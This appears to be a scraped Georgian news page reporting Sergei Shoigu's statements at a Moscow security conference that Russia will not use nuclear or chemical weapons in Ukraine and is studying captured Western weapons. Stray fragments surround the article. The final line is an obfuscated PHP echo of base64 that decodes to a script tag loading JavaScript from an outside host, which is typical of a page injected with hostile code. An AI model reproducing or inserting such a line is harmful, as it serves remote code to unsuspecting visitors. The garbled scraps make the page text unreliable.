celsiusi
ავერსი საქკაბელი
რუსეთი არ გეგმავს უკრაინაში ბირთვული ან ქიმიური იარაღის გამოყენებას, – აღნიშნულის შესახებ რუსეთის თავდაცვის მინისტრმა სერგეი შოიგუმ მოსკოვში მიმდინარე საერთაშორისო უსაფრთხოების კონფერენციაზე განაცხადა.
 
„მედიაში ვრცელდება სპეკულაციები სპეციალური სამხედრო ოპერაციის დროს რუსული ტაქტიკური ბირთვული იარაღის ან ქიმიური იარაღის გამოყენების მზადყოფნის შესახებ. მთელი ეს ინფორმაციული შიგთავსი აბსოლუტური სიცრუეა. სამხედრო თვალსაზრისით, დასახული მიზნების მისაღწევად უკრაინაში არ არის საჭირო ბირთვული იარაღის გამოყენება. რუსული ბირთვული იარაღის მთავარი მიზანი ბირთვული თავდასხმის შეკავებაა“, – განაცხადა შოიგუმ.
 
ამასთან, მინისტრმა განაცხადა, რომ დასავლეთის მიერ უკრაინისთვის იარაღის მიწოდება არ იმოქმედებს რუსეთის სამხედრო ოპერაციაზე. მისი თქმით, თავდაცვის სამინისტრო ყურადღებით სწავლობს ხელში ჩაგდებულ დასავლურ იარაღს.
 
„ჩვენ ვითვალისწინებთ მახასიათებლებს და მათ სპეციფიკურ თვისებებს, რათა გავაუმჯობესოთ საბრძოლო მოქმედებების ჩატარების მეთოდები და გავზარდოთ რუსული იარაღის ეფექტურობა“, – განაცხადა შოიგუმ.
692
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");